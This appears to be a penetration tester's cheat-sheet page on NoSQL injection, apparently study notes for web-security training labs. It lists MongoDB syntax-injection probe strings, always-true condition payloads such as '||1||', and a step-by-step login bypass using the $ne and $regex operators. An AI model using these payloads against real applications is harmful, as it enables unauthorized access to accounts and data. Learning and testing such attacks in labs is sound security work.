OFFENSIVE | DEFENSIVE | WIKI | ABOUT

<<



CONTEXT INFORMATION
NoSQL databases are different than the normal SQL databases. The structure is different so the way to query the DB will differ. 
The structure of NoSQL DB is [key:pair] structure.

FUZZING is the most common attack for this !!

SAMPLE: https://machetevault.com/product/lookup?category=FUZZ

Possible DBS: mongoDB, redis, couch DB & more.

Two types: 
	
1. Syntax Injection: It is when you can break the query.
2. Operator Injection: It is when you can use operators to manipulate the queries.

	

GENERAL INFORMATION
NOTES: 

1. Inspection of requests is needed. [burpsuite]
2. Techniques used for SQL Injection can be used, it will differ the parameters and more but logic can be adapted.
3. Use URL/JSON encoding when needed.
	
C1: '
C2: '+'

.C1. | .C2.

Simple quote (') is used to determine which characters are interpreted as syntax, it is important to check requests/response before 
and after and compare it. In order to escape queries the slash can be used. (\)

SAMPLE: this.car == '\''

:::: MONGO DB

C1: '"`{;$Foo}$Foo \xYZ

.C1. 

:::: CONDITIONAL BEHAVIOR

NOTE: inspection of requests/response is needed. [burpsuite]

C1: FALSE' && 0 && 'x
C2: TRUE' && 1 && 'x
	
.C1. | .C2. 

:::: OVERRIDING CONDITIONS

NOTE: this method is always TRUE.
	
C1: '||1||'

.C1.	

	

NOSQL OPERATORS
NOTES:

- Requests inspection is needed.
- It is normally as key:pair values.

:::> BYPASS AUTHENTICATION

:::> MONGO DB

There's a technique to use two operators that can help to discover if operators are allowed and also those can lead to authentication 
bypass.

Request login sample:

{
"username":"wiener",
"password":"peter"
}

OPERATORS:

{"$ne":""} | selects the documents where the value of the specified field is not equal to the specified value. This includes 
documents that do not contain the specified field.

{"$regex":""} | provides regular expression capabilities for pattern matching strings in queries.

TECHNIQUE: Case scenario with a valid user to attempt!!

As it is to bypass authentication methods, normally it is attempted on input fields and also, probably exist some users as reference 
to use it.

.C1. | .C2.

First Test: username:{"$ne":""} with valid password. it is bypassing ?

Second Test: username:{"$regex":"wien.*"} with valid password. it is bypassing ?
NOTE: "wien.*" >> it is a valid user with a wilcard to retrieve all related to that pattern. 

Third Test: username as {"$ne":""} with password as {"$ne":""}. it is bypassing ?
NOTE: if you get, <p class=is-warning>Query returned unexpected number of records</p> It means, that 
more than one user has been selected. So apply fourth test.

Fourth Test: username as {"$regex":"admin.*"} with password as {"$ne":""}. it is bypassing ?
NOTE: It is trying to bypass the user "admin" with any value as password.

	

GO BACK